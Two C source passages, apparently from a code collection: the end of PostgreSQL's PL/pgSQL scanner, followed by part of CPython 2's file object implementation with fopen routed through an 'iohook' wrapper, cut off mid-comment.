strchr(cur_line_start, '\n')) != NULL) { cur_line_start = c + 1; cur_line_num++; } return cur_line_num; } /* * Called before any actual parsing is done * * Note: the passed "str" must remain valid until plpgsql_scanner_finish(). * Although it is not fed directly to flex, we need the original string * to cite in error messages. */ void plpgsql_scanner_init(const char *str, int functype) { Size slen; slen = strlen(str); /* * Might be left over after ereport() */ if (YY_CURRENT_BUFFER) plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER); /* * Make a scan buffer with special termination needed by flex. */ scanbuf = palloc(slen + 2); memcpy(scanbuf, str, slen); scanbuf[slen] = scanbuf[slen + 1] = YY_END_OF_BUFFER_CHAR; scanbufhandle = plpgsql_base_yy_scan_buffer(scanbuf,slen + 2); /* Other setup */ scanstr = str; scanner_functype = functype; scanner_typereported = false; have_pushback_token = false; cur_line_start = scanbuf; cur_line_num = 1; /*---------- * Hack: skip any initial newline, so that in the common coding layout * CREATE FUNCTION ... AS ' * code body * ' LANGUAGE plpgsql; * we will think "line 1" is what the programmer thinks of as line 1. *---------- */ if (*cur_line_start == '\r') cur_line_start++; if (*cur_line_start == '\n') cur_line_start++; BEGIN(INITIAL); } /* * Called after parsing is done to clean up after plpgsql_scanner_init() */ void plpgsql_scanner_finish(void) { plpgsql_base_yy_delete_buffer(scanbufhandle); pfree(scanbuf); } /* * Called after a T_STRING token is read to get the string literal's value * as a palloc'd string. (We make this a separate call because in many * scenarios there's no need to get the decoded value.) * * Note: we expect the literal to be the most recently lexed token. This * would not work well if we supported multiple-token pushback or if * plpgsql_yylex() wanted to read ahead beyond a T_STRING token. */ char * plpgsql_get_string_value(void) { char *result; const char *cp; int len; if (dolqlen > 0) { /* Token is a $foo$...$foo$ string */ len = plpgsql_base_yyleng - 2 * dolqlen; Assert(len >= 0); result = (char *) palloc(len + 1); memcpy(result, plpgsql_base_yytext + dolqlen, len); result[len] = '\0'; } else if (*plpgsql_base_yytext == 'E' || *plpgsql_base_yytext == 'e') { /* Token is an E'...' string */ result = (char *) palloc(plpgsql_base_yyleng + 1); /* more than enough room */ len = 0; for (cp = plpgsql_base_yytext + 2; *cp; cp++) { if (*cp == '\'') { if (cp[1] == '\'') result[len++] = *cp++; /* else it must be string end quote */ } else if (*cp == '\\') { if (cp[1] != '\0') /* just a paranoid check */ result[len++] = *(++cp); } else result[len++] = *cp; } result[len] = '\0'; } else { /* Token is a '...' string */ result = (char *) palloc(plpgsql_base_yyleng + 1); /* more than enough room */ len = 0; for (cp = plpgsql_base_yytext + 1; *cp; cp++) { if (*cp == '\'') { if (cp[1] == '\'') result[len++] = *cp++; /* else it must be string end quote */ } else if (*cp == '\\') { if (cp[1] != '\0') /* just a paranoid check */ result[len++] = *(++cp); } else result[len++] = *cp; } result[len] = '\0'; } return result; }
504244.c
/* File object implementation */ #define PY_SSIZE_T_CLEAN #include "Python.h" #include "structmember.h" #include "iohook.h" #ifdef HAVE_SYS_TYPES_H #include <sys/types.h> #endif /* HAVE_SYS_TYPES_H */ #ifdef MS_WINDOWS #define fileno _fileno /* can simulate truncate with Win32 API functions; see file_truncate */ #define HAVE_FTRUNCATE #define WIN32_LEAN_AND_MEAN #include <windows.h> #endif #if defined(PYOS_OS2) && defined(PYCC_GCC) #include <io.h> #endif #define BUF(v) PyString_AS_STRING((PyStringObject *)v) #ifdef HAVE_ERRNO_H #include <errno.h> #endif #ifdef HAVE_GETC_UNLOCKED #define GETC(f) getc_unlocked(f) #define FLOCKFILE(f) flockfile(f) #define FUNLOCKFILE(f) funlockfile(f) #else #define GETC(f) getc(f) #define FLOCKFILE(f) #define FUNLOCKFILE(f) #endif /* Bits in f_newlinetypes */ #define NEWLINE_UNKNOWN 0 /* No newline seen, yet */ #define NEWLINE_CR 1 /* \r newline seen */ #define NEWLINE_LF 2 /* \n newline seen */ #define NEWLINE_CRLF 4 /* \r\n newline seen */ /* * These macros release the GIL while preventing the f_close() function being * called in the interval between them. For that purpose, a running total of * the number of currently running unlocked code sections is kept in * the unlocked_count field of the PyFileObject. The close() method raises * an IOError if that field is non-zero. See issue #815646, #595601. */ #define FILE_BEGIN_ALLOW_THREADS(fobj) \ { \ fobj->unlocked_count++; \ Py_BEGIN_ALLOW_THREADS #define FILE_END_ALLOW_THREADS(fobj) \ Py_END_ALLOW_THREADS \ fobj->unlocked_count--; \ assert(fobj->unlocked_count >= 0); \ } #define FILE_ABORT_ALLOW_THREADS(fobj) \ Py_BLOCK_THREADS \ fobj->unlocked_count--; \ assert(fobj->unlocked_count >= 0); #ifdef __cplusplus extern "C" { #endif FILE * PyFile_AsFile(PyObject *f) { if (f == NULL || !PyFile_Check(f)) return NULL; else return ((PyFileObject *)f)->f_fp; } void PyFile_IncUseCount(PyFileObject *fobj) { fobj->unlocked_count++; } void PyFile_DecUseCount(PyFileObject *fobj) { fobj->unlocked_count--; assert(fobj->unlocked_count >= 0); } PyObject * PyFile_Name(PyObject *f) { if (f == NULL || !PyFile_Check(f)) return NULL; else return ((PyFileObject *)f)->f_name; } /* This is a safe wrapper around PyObject_Print to print to the FILE of a PyFileObject. PyObject_Print releases the GIL but knows nothing about PyFileObject. */ static int file_PyObject_Print(PyObject *op, PyFileObject *f, int flags) { int result; PyFile_IncUseCount(f); result = PyObject_Print(op, f->f_fp, flags); PyFile_DecUseCount(f); return result; } /* On Unix, fopen will succeed for directories. In Python, there should be no file objects referring to directories, so we need a check. */ static PyFileObject* dircheck(PyFileObject* f) { #if defined(HAVE_FSTAT) && defined(S_IFDIR) && defined(EISDIR) struct stat buf; int res; if (f->f_fp == NULL) return f; Py_BEGIN_ALLOW_THREADS res = fstat(fileno(f->f_fp), &buf); Py_END_ALLOW_THREADS if (res == 0 && S_ISDIR(buf.st_mode)) { char *msg = strerror(EISDIR); PyObject *exc = PyObject_CallFunction(PyExc_IOError, "(isO)", EISDIR, msg, f->f_name); PyErr_SetObject(PyExc_IOError, exc); Py_XDECREF(exc); return NULL; } #endif return f; } static PyObject * fill_file_fields(PyFileObject *f, FILE *fp, PyObject *name, char *mode, int (*close)(FILE *)) { assert(name != NULL); assert(f != NULL); assert(PyFile_Check(f)); assert(f->f_fp == NULL); Py_DECREF(f->f_name); Py_DECREF(f->f_mode); Py_DECREF(f->f_encoding); Py_DECREF(f->f_errors); Py_INCREF(name); f->f_name = name; f->f_mode = PyString_FromString(mode); f->f_close = close; f->f_softspace = 0; f->f_binary = strchr(mode,'b') != NULL; f->f_buf = NULL; f->f_univ_newline = (strchr(mode, 'U') != NULL); f->f_newlinetypes = NEWLINE_UNKNOWN; f->f_skipnextlf = 0; Py_INCREF(Py_None); f->f_encoding = Py_None; Py_INCREF(Py_None); f->f_errors = Py_None; f->readable = f->writable = 0; if (strchr(mode, 'r') != NULL || f->f_univ_newline) f->readable = 1; if (strchr(mode, 'w') != NULL || strchr(mode, 'a') != NULL) f->writable = 1; if (strchr(mode, '+') != NULL) f->readable = f->writable = 1; if (f->f_mode == NULL) return NULL; f->f_fp = fp; f = dircheck(f); return (PyObject *) f; } #if defined _MSC_VER && _MSC_VER >= 1400 && defined(__STDC_SECURE_LIB__) #define Py_VERIFY_WINNT /* The CRT on windows compiled with Visual Studio 2005 and higher may * assert if given invalid mode strings. This is all fine and well * in static languages like C where the mode string is typcially hard * coded. But in Python, were we pass in the mode string from the user, * we need to verify it first manually */ static int _PyVerify_Mode_WINNT(const char *mode) { /* See if mode string is valid on Windows to avoid hard assertions */ /* remove leading spacese */ int singles = 0; int pairs = 0; int encoding = 0; const char *s, *c; while(*mode == ' ') /* strip initial spaces */ ++mode; if (!strchr("rwa", *mode)) /* must start with one of these */ return 0; while (*++mode) { if (*mode == ' ' || *mode == 'N') /* ignore spaces and N */ continue; s = "+TD"; /* each of this can appear only once */ c = strchr(s, *mode); if (c) { ptrdiff_t idx = s-c; if (singles & (1<<idx)) return 0; singles |= (1<<idx); continue; } s = "btcnSR"; /* only one of each letter in the pairs allowed */ c = strchr(s, *mode); if (c) { ptrdiff_t idx = (s-c)/2; if (pairs & (1<<idx)) return 0; pairs |= (1<<idx); continue; } if (*mode == ',') { encoding = 1; break; } return 0; /* found an invalid char */ } if (encoding) { char *e[] = {"UTF-8", "UTF-16LE", "UNICODE"}; while (*mode == ' ') ++mode; /* find 'ccs =' */ if (strncmp(mode, "ccs", 3)) return 0; mode += 3; while (*mode == ' ') ++mode; if (*mode != '=') return 0; while (*mode == ' ') ++mode; for(encoding = 0; encoding<_countof(e); ++encoding) { size_t l = strlen(e[encoding]); if (!strncmp(mode, e[encoding], l)) { mode += l; /* found a valid encoding */ break; } } if (encoding == _countof(e)) return 0; } /* skip trailing spaces */ while (*mode == ' ') ++mode; return *mode == '\0'; /* must be at the end of the string */ } #endif /* check for known incorrect mode strings - problem is, platforms are free to accept any mode characters they like and are supposed to ignore stuff they don't understand... write or append mode with universal newline support is expressly forbidden by PEP 278. Additionally, remove the 'U' from the mode string as platforms won't know what it is. Non-zero return signals an exception */ int _PyFile_SanitizeMode(char *mode) { char *upos; size_t len = strlen(mode); if (!len) { PyErr_SetString(PyExc_ValueError, "empty mode string"); return -1; } upos = strchr(mode, 'U'); if (upos) { memmove(upos, upos+1, len-(upos-mode)); /* incl null char */ if (mode[0] == 'w' || mode[0] == 'a') { PyErr_Format(PyExc_ValueError, "universal newline " "mode can only be used with modes " "starting with 'r'"); return -1; } if (mode[0] != 'r') { memmove(mode+1, mode, strlen(mode)+1); mode[0] = 'r'; } if (!strchr(mode, 'b')) { memmove(mode+2, mode+1, strlen(mode)); mode[1] = 'b'; } } else if (mode[0] != 'r' && mode[0] != 'w' && mode[0] != 'a') { PyErr_Format(PyExc_ValueError, "mode string must begin with " "one of 'r', 'w', 'a' or 'U', not '%.200s'", mode); return -1; } #ifdef Py_VERIFY_WINNT /* additional checks on NT with visual studio 2005 and higher */ if (!_PyVerify_Mode_WINNT(mode)) { PyErr_Format(PyExc_ValueError, "Invalid mode ('%.50s')", mode); return -1; } #endif return 0; } static PyObject * open_the_file(PyFileObject *f, char *name, char *mode) { char *newmode; assert(f != NULL); assert(PyFile_Check(f)); #ifdef MS_WINDOWS /* windows ignores the passed name in order to support Unicode */ assert(f->f_name != NULL); #else assert(name != NULL); #endif assert(mode != NULL); assert(f->f_fp == NULL); /* probably need to replace 'U' by 'rb' */ newmode = PyMem_MALLOC(strlen(mode) + 3); if (!newmode) { PyErr_NoMemory(); return NULL; } strcpy(newmode, mode); if (_PyFile_SanitizeMode(newmode)) { f = NULL; goto cleanup; } /* rexec.py can't stop a user from getting the file() constructor -- all they have to do is get *any* file object f, and then do type(f). Here we prevent them from doing damage with it. */ if (PyEval_GetRestricted()) { PyErr_SetString(PyExc_IOError, "file() constructor not accessible in restricted mode"); f = NULL; goto cleanup; } errno = 0; #ifdef MS_WINDOWS if (PyUnicode_Check(f->f_name)) { PyObject *wmode; wmode = PyUnicode_DecodeASCII(newmode, strlen(newmode), NULL); if (f->f_name && wmode) { FILE_BEGIN_ALLOW_THREADS(f) /* PyUnicode_AS_UNICODE OK without thread lock as it is a simple dereference. */ f->f_fp = hook_wfopen(PyUnicode_AS_UNICODE(f->f_name), PyUnicode_AS_UNICODE(wmode)); FILE_END_ALLOW_THREADS(f) } Py_XDECREF(wmode); } #endif if (NULL == f->f_fp && NULL != name) { FILE_BEGIN_ALLOW_THREADS(f) f->f_fp = hook_fopen(name, newmode); FILE_END_ALLOW_THREADS(f) } if (f->f_fp == NULL) { #if defined _MSC_VER && (_MSC_VER < 1400 || !defined(__STDC_SECURE_LIB__)) /* MSVC 6 (Microsoft) leaves errno at 0 for bad mode strings, * across all Windows flavors. When it sets EINVAL varies * across Windows flavors, the exact conditions aren't * documented, and the answer lies in the OS's implementation * of Win32's CreateFile function (whose source is secret). * Seems the best we can do is map EINVAL to ENOENT. * Starting with Visual Studio .NET 2005, EINVAL is correctly * set by our CRT error handler (set in exceptions.c.) */ if (errno == 0) /* bad mode string */ errno = EINVAL; else if (errno == EINVAL) /* unknown, but not a mode string */ errno = ENOENT; #endif /* EINVAL is returned when an invalid filename or * an invalid mode is supplied. */ if (errno == EINVAL) { PyObject *v; char message[100]; PyOS_snprintf(message, 100, "invalid mode ('%.50s') or filename", mode); v = Py_BuildValue("(isO)", errno, message, f->f_name); if (v != NULL) { PyErr_SetObject(PyExc_IOError, v); Py_DECREF(v); } } else PyErr_SetFromErrnoWithFilenameObject(PyExc_IOError, f->f_name); f = NULL; } if (f != NULL) f = dircheck(f); cleanup: PyMem_FREE(newmode); return (PyObject *)f; } static PyObject * close_the_file(PyFileObject *f) { int sts = 0; int (*local_close)(FILE *); FILE *local_fp = f->f_fp; char *local_setbuf = f->f_setbuf; if (local_fp != NULL) { local_close = f->f_close; if (local_close != NULL && f->unlocked_count > 0) { if (Py_REFCNT(f) > 0) { PyErr_SetString(PyExc_IOError, "close() called during concurrent " "operation on the same file object"); } else { /* This should not happen unless someone is * carelessly playing with the PyFileObject * struct fields and/or its associated FILE * pointer. */ PyErr_SetString(PyExc_SystemError, "PyFileObject locking error in " "destructor (refcnt <= 0 at close)"); } return NULL; } /* NULL out the FILE pointer before releasing the GIL, because * it will not be valid anymore after the close() function is * called. */ f->f_fp = NULL; if (local_close != NULL) { /* Issue #9295: must temporarily reset f_setbuf so that another thread doesn't free it when running file_close() concurrently. Otherwise this close() will crash when flushing the buffer. */ f->f_setbuf = NULL; Py_BEGIN_ALLOW_THREADS errno = 0; sts = (*local_close)(local_fp); Py_END_ALLOW_THREADS f->f_setbuf = local_setbuf; if (sts == EOF) return PyErr_SetFromErrno(PyExc_IOError); if (sts != 0) return PyInt_FromLong((long)sts); } } Py_RETURN_NONE; } PyObject * PyFile_FromFile(FILE *fp, char *name, char *mode, int (*close)(FILE *)) { PyFileObject *f; PyObject *o_name; f = (PyFileObject *)PyFile_Type.tp_new(&PyFile_Type, NULL, NULL); if (f == NULL) return NULL; o_name = PyString_FromString(name); if (o_name == NULL) { if (close != NULL && fp != NULL) close(fp); Py_DECREF(f); return NULL; } if (fill_file_fields(f, fp, o_name, mode, close) == NULL) { Py_DECREF(f); Py_DECREF(o_name); return NULL; } Py_DECREF(o_name); return (PyObject *)f; } PyObject * PyFile_FromString(char *name, char *mode) { extern int fclose(FILE *); PyFileObject *f; f = (PyFileObject *)PyFile_FromFile((FILE *)NULL, name, mode, fclose); if (f != NULL) { if (open_the_file(f, name, mode) == NULL) { Py_DECREF(f); f = NULL; } } return (PyObject *)f; } void PyFile_SetBufSize(PyObject *f, int bufsize) { PyFileObject *file = (PyFileObject *)f; if (bufsize >= 0) { int type; switch (bufsize) { case 0: type = _IONBF; break; #ifdef HAVE_SETVBUF case 1: type = _IOLBF; bufsize = BUFSIZ; break; #endif default: type = _IOFBF; #ifndef HAVE_SETVBUF bufsize = BUFSIZ; #endif break; } fflush(file->f_fp); if (type == _IONBF) { PyMem_Free(file->f_setbuf); file->f_setbuf = NULL; } else { file->f_setbuf = (char *)PyMem_Realloc(file->f_setbuf, bufsize); } #ifdef HAVE_SETVBUF setvbuf(file->f_fp, file->f_setbuf, type, bufsize); #else /* !HAVE_SETVBUF */ setbuf(file->f_fp, file->f_setbuf); #endif /* !HAVE_SETVBUF */ } } /* Set the encoding used to output Unicode strings. Return 1 on success, 0 on failure. */ int PyFile_SetEncoding(PyObject *f, const char *enc) { return PyFile_SetEncodingAndErrors(f, enc, NULL); } int PyFile_SetEncodingAndErrors(PyObject *f, const char *enc, char* errors) { PyFileObject *file = (PyFileObject*)f; PyObject *str, *oerrors; assert(PyFile_Check(f)); str = PyString_FromString(enc); if (!str) return 0; if (errors) { oerrors = PyString_FromString(errors); if (!oerrors) { Py_DECREF(str); return 0; } } else { oerrors = Py_None; Py_INCREF(Py_None); } Py_SETREF(file->f_encoding, str); Py_SETREF(file->f_errors, oerrors); return 1; } static PyObject * err_closed(void) { PyErr_SetString(PyExc_ValueError, "I/O operation on closed file"); return NULL; } static PyObject * err_mode(char *action) { PyErr_Format(PyExc_IOError, "File not open for %s", action); return NULL; } /* Refuse regular file I/O if there's data in the iteration-buffer. * Mixing them would cause data to arrive out of order, as the read* * methods don't use the iteration buffer. */ static PyObject * err_iterbuffered(void) { PyErr_SetString(PyExc_ValueError, "Mixing iteration and read methods would lose data"); return NULL; } static void drop_file_readahead(PyFileObject *f) { PyMem_FREE(f->f_buf); f->f_buf = NULL; } /* Methods */ static void file_dealloc(PyFileObject *f) { PyObject *ret; if (f->weakreflist != NULL) PyObject_ClearWeakRefs((PyObject *) f); ret = close_the_file(f); if (!ret) { PySys_WriteStderr("close failed in file object destructor:\n"); PyErr_Print(); } else { Py_DECREF(ret); } PyMem_Free(f->f_setbuf); Py_XDECREF(f->f_name); Py_XDECREF(f->f_mode); Py_XDECREF(f->f_encoding); Py_XDECREF(f->f_errors); drop_file_readahead(f); Py_TYPE(f)->tp_free((PyObject *)f); } static PyObject * file_repr(PyFileObject *f) { PyObject *ret = NULL; PyObject *name = NULL; if (PyUnicode_Check(f->f_name)) { #ifdef Py_USING_UNICODE const char *name_str; name = PyUnicode_AsUnicodeEscapeString(f->f_name); name_str = name ? PyString_AsString(name) : "?"; ret = PyString_FromFormat("<%s file u'%s', mode '%s' at %p>", f->f_fp == NULL ? "closed" : "open", name_str, PyString_AsString(f->f_mode), f); Py_XDECREF(name); return ret; #endif } else { name = PyObject_Repr(f->f_name); if (name == NULL) return NULL; ret = PyString_FromFormat("<%s file %s, mode '%s' at %p>", f->f_fp == NULL ? "closed" : "open", PyString_AsString(name), PyString_AsString(f->f_mode), f); Py_XDECREF(name); return ret; } } static PyObject * file_close(PyFileObject *f) { PyObject *sts = close_the_file(f); if (sts) { PyMem_Free(f->f_setbuf); f->f_setbuf = NULL; } return sts; } /* Our very own off_t-like type, 64-bit if possible */ #if !defined(HAVE_LARGEFILE_SUPPORT) typedef off_t Py_off_t; #elif SIZEOF_OFF_T >= 8 typedef off_t Py_off_t; #elif SIZEOF_FPOS_T >= 8 typedef fpos_t Py_off_t; #else #error "Large file support, but neither off_t nor fpos_t is large enough." #endif /* a portable fseek() function return 0 on success, non-zero on failure (with errno set) */ static int _portable_fseek(FILE *fp, Py_off_t offset, int whence) { #if !defined(HAVE_LARGEFILE_SUPPORT) return fseek(fp, offset, whence); #elif defined(HAVE_FSEEKO) && SIZEOF_OFF_T >= 8 return fseeko(fp, offset, whence); #elif defined(HAVE_FSEEK64) return fseek64(fp, offset, whence); #elif defined(__BEOS__) return _fseek(fp, offset, whence); #elif SIZEOF_FPOS_T >= 8 /* lacking a 64-bit capable fseek(), use a 64-bit capable fsetpos() and fgetpos() to implement fseek()*/ fpos_t pos; switch (whence) { case SEEK_END: #ifdef MS_WINDOWS fflush(fp); if (_lseeki64(fileno(fp), 0, 2) == -1) return -1; #else if (fseek(fp, 0, SEEK_END) != 0) return -1; #endif /* fall through */ case SEEK_CUR: if (fgetpos(fp, &pos) != 0) return -1; offset += pos; break; /* case SEEK_SET: break; */ } return fsetpos(fp, &offset); #else #error "Large file support, but no way to fseek." #endif } /* a portable ftell() function Return -1 on failure with errno set appropriately, current file position on success */ static Py_off_t _portable_ftell(FILE* fp) { #if !defined(HAVE_LARGEFILE_SUPPORT) return ftell(fp); #elif defined(HAVE_FTELLO) && SIZEOF_OFF_T >= 8 return ftello(fp); #elif defined(HAVE_FTELL64) return ftell64(fp); #elif SIZEOF_FPOS_T >= 8 fpos_t pos; if (fgetpos(fp, &pos) != 0) return -1; return pos; #else #error "Large file support, but no way to ftell." #endif } static PyObject * file_seek(PyFileObject *f, PyObject *args) { int whence; int ret; Py_off_t offset; PyObject *offobj, *off_index; if (f->f_fp == NULL) return err_closed(); drop_file_readahead(f); whence = 0; if (!PyArg_ParseTuple(args, "O|i:seek", &offobj, &whence)) return NULL; off_index = PyNumber_Index(offobj); if (!off_index) { if (!PyFloat_Check(offobj)) return NULL; /* Deprecated in 2.6 */ PyErr_Clear(); if (PyErr_WarnEx(PyExc_DeprecationWarning, "integer argument expected, got float", 1) < 0) return NULL; off_index = offobj; Py_INCREF(offobj); } #if !defined(HAVE_LARGEFILE_SUPPORT) offset = PyInt_AsLong(off_index); #else offset = PyLong_Check(off_index) ? PyLong_AsLongLong(off_index) : PyInt_AsLong(off_index); #endif Py_DECREF(off_index); if (PyErr_Occurred()) return NULL; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, offset, whence); FILE_END_ALLOW_THREADS(f) if (ret != 0) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } f->f_skipnextlf = 0; Py_INCREF(Py_None); return Py_None; } #ifdef HAVE_FTRUNCATE static PyObject * file_truncate(PyFileObject *f, PyObject *args) { Py_off_t newsize; PyObject *newsizeobj = NULL; Py_off_t initialpos; int ret; if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); if (!PyArg_UnpackTuple(args, "truncate", 0, 1, &newsizeobj)) return NULL; /* Get current file position. If the file happens to be open for * update and the last operation was an input operation, C doesn't * define what the later fflush() will do, but we promise truncate() * won't change the current position (and fflush() *does* change it * then at least on Windows). The easiest thing is to capture * current pos now and seek back to it at the end. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; initialpos = _portable_ftell(f->f_fp); FILE_END_ALLOW_THREADS(f) if (initialpos == -1) goto onioerror; /* Set newsize to current position if newsizeobj NULL, else to the * specified value. */ if (newsizeobj != NULL) { #if !defined(HAVE_LARGEFILE_SUPPORT) newsize = PyInt_AsLong(newsizeobj); #else newsize = PyLong_Check(newsizeobj) ? PyLong_AsLongLong(newsizeobj) : PyInt_AsLong(newsizeobj); #endif if (PyErr_Occurred()) return NULL; } else /* default to current position */ newsize = initialpos; /* Flush the stream. We're mixing stream-level I/O with lower-level * I/O, and a flush may be necessary to synch both platform views * of the current file state. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = fflush(f->f_fp); FILE_END_ALLOW_THREADS(f) if (ret != 0) goto onioerror; #ifdef MS_WINDOWS /* MS _chsize doesn't work if newsize doesn't fit in 32 bits, so don't even try using it. */ { HANDLE hFile; /* Have to move current pos to desired endpoint on Windows. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, newsize, SEEK_SET) != 0; FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; /* Truncate. Note that this may grow the file! */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; hFile = (HANDLE)_get_osfhandle(fileno(f->f_fp)); ret = hFile == (HANDLE)-1; if (ret == 0) { ret = SetEndOfFile(hFile) == 0; if (ret) errno = EACCES; } FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; } #else FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = ftruncate(fileno(f->f_fp), newsize); FILE_END_ALLOW_THREADS(f) if (ret != 0) goto onioerror; #endif /* !MS_WINDOWS */ /* Restore original file position. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, initialpos, SEEK_SET) != 0; FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; Py_INCREF(Py_None); return Py_None; onioerror: PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } #endif /* HAVE_FTRUNCATE */ static PyObject * file_tell(PyFileObject *f) { Py_off_t pos; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) errno = 0; pos = _portable_ftell(f->f_fp); FILE_END_ALLOW_THREADS(f) if (pos == -1) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } if (f->f_skipnextlf) { int c; c = GETC(f->f_fp); if (c == '\n') { f->f_newlinetypes |= NEWLINE_CRLF; pos++; f->f_skipnextlf = 0; } else if (c != EOF) ungetc(c, f->f_fp); } #if !defined(HAVE_LARGEFILE_SUPPORT) return PyInt_FromLong(pos); #else return PyLong_FromLongLong(pos); #endif } static PyObject * file_fileno(PyFileObject *f) { if (f->f_fp == NULL) return err_closed(); return PyInt_FromLong((long) fileno(f->f_fp)); } static PyObject * file_flush(PyFileObject *f) { int res; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) errno = 0; res = fflush(f->f_fp); FILE_END_ALLOW_THREADS(f) if (res != 0) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } Py_INCREF(Py_None); return Py_None; } static PyObject * file_isatty(PyFileObject *f) { long res; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) res = isatty((int)fileno(f->f_fp)); FILE_END_ALLOW_THREADS(f) return PyBool_FromLong(res); } #if BUFSIZ < 8192 #define SMALLCHUNK 8192 #else #define SMALLCHUNK BUFSIZ #endif static size_t new_buffersize(PyFileObject *f, size_t currentsize) { #ifdef HAVE_FSTAT off_t pos, end; struct stat st; int res; size_t bufsize = 0; FILE_BEGIN_ALLOW_THREADS(f) res = fstat(fileno(f->f_fp), &st); if (res == 0) { end = st.st_size; /* The following is not a bug: we really need to call lseek() *and* ftell(). The reason is that some stdio libraries mistakenly flush their buffer when ftell() is called and the lseek() call it makes fails, thereby throwing away data that cannot be recovered in any way. To avoid this, we first test lseek(), and only call ftell() if lseek() works. We can't use the lseek() value either, because we need to take the amount of buffered data into account. (Yet another reason why stdio stinks. :-) */ pos = lseek(fileno(f->f_fp), 0L, SEEK_CUR); if (pos >= 0) { pos = ftell(f->f_fp); } if (pos < 0) clearerr(f->f_fp); if (end > pos && pos >= 0) bufsize = currentsize + end - pos + 1; /* Add 1 so if the file were to grow we'd notice. */ } FILE_END_ALLOW_THREADS(f) if (bufsize != 0) return bufsize; #endif /* Expand the buffer by an amount proportional to the current size, giving us amortized linear-time behavior. Use a less-than-double growth factor to avoid excessive allocation. */ return currentsize + (currentsize >> 3) + 6; } #if defined(EWOULDBLOCK) && defined(EAGAIN) && EWOULDBLOCK != EAGAIN #define BLOCKED_ERRNO(x) ((x) == EWOULDBLOCK || (x) == EAGAIN) #else #ifdef EWOULDBLOCK #define BLOCKED_ERRNO(x) ((x) == EWOULDBLOCK) #else #ifdef EAGAIN #define BLOCKED_ERRNO(x) ((x) == EAGAIN) #else #define BLOCKED_ERRNO(x) 0 #endif #endif #endif static PyObject * file_read(PyFileObject *f, PyObject *args) { long bytesrequested = -1; size_t bytesread, buffersize, chunksize; PyObject *v; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|l:read", &bytesrequested)) return NULL; if (bytesrequested < 0) buffersize = new_buffersize(f, (size_t)0); else buffersize = bytesrequested; if (buffersize > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "requested number of bytes is more than a Python string can hold"); return NULL; } v = PyString_FromStringAndSize((char *)NULL, buffersize); if (v == NULL) return NULL; bytesread = 0; for (;;) { int interrupted; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; chunksize = Py_UniversalNewlineFread(BUF(v) + bytesread, buffersize - bytesread, f->f_fp, (PyObject *)f); interrupted = ferror(f->f_fp) && errno == EINTR; FILE_END_ALLOW_THREADS(f) if (interrupted) { clearerr(f->f_fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } } if (chunksize == 0) { if (interrupted) continue; if (!ferror(f->f_fp)) break; clearerr(f->f_fp); /* When in non-blocking mode, data shouldn't * be discarded if a blocking signal was * received. That will also happen if * chunksize != 0, but bytesread < buffersize. */ if (bytesread > 0 && BLOCKED_ERRNO(errno)) break; PyErr_SetFromErrno(PyExc_IOError); Py_DECREF(v); return NULL; } bytesread += chunksize; if (bytesread < buffersize && !interrupted) { clearerr(f->f_fp); break; } if (bytesrequested < 0) { buffersize = new_buffersize(f, buffersize); if (_PyString_Resize(&v, buffersize) < 0) return NULL; } else { /* Got what was requested. */ break; } } if (bytesread != buffersize && _PyString_Resize(&v, bytesread)) return NULL; return v; } static PyObject * file_readinto(PyFileObject *f, PyObject *args) { char *ptr; Py_ssize_t ntodo; Py_ssize_t ndone, nnow; Py_buffer pbuf; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "w*", &pbuf)) return NULL; ptr = pbuf.buf; ntodo = pbuf.len; ndone = 0; while (ntodo > 0) { int interrupted; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; nnow = Py_UniversalNewlineFread(ptr+ndone, ntodo, f->f_fp, (PyObject *)f); interrupted = ferror(f->f_fp) && errno == EINTR; FILE_END_ALLOW_THREADS(f) if (interrupted) { clearerr(f->f_fp); if (PyErr_CheckSignals()) { PyBuffer_Release(&pbuf); return NULL; } } if (nnow == 0) { if (interrupted) continue; if (!ferror(f->f_fp)) break; PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); PyBuffer_Release(&pbuf); return NULL; } ndone += nnow; ntodo -= nnow; } PyBuffer_Release(&pbuf); return PyInt_FromSsize_t(ndone); } /************************************************************************** Routine to get next line using platform fgets(). Under MSVC 6: + MS threadsafe getc is very slow (multiple layers of function calls before+ after each character, to lock+unlock the stream). + The stream-locking functions are MS-internal -- can't access them from user code. + There's nothing Tim could find in the MS C or platform SDK libraries that can worm around this. + MS fgets locks/unlocks only once per line; it's the only hook we have. So we use fgets for speed(!), despite that it's painful. MS realloc is also slow. Reports from other platforms on this method vs getc_unlocked (which MS doesn't have): Linux a wash Solaris a wash Tru64 Unix getline_via_fgets significantly faster CAUTION: The C std 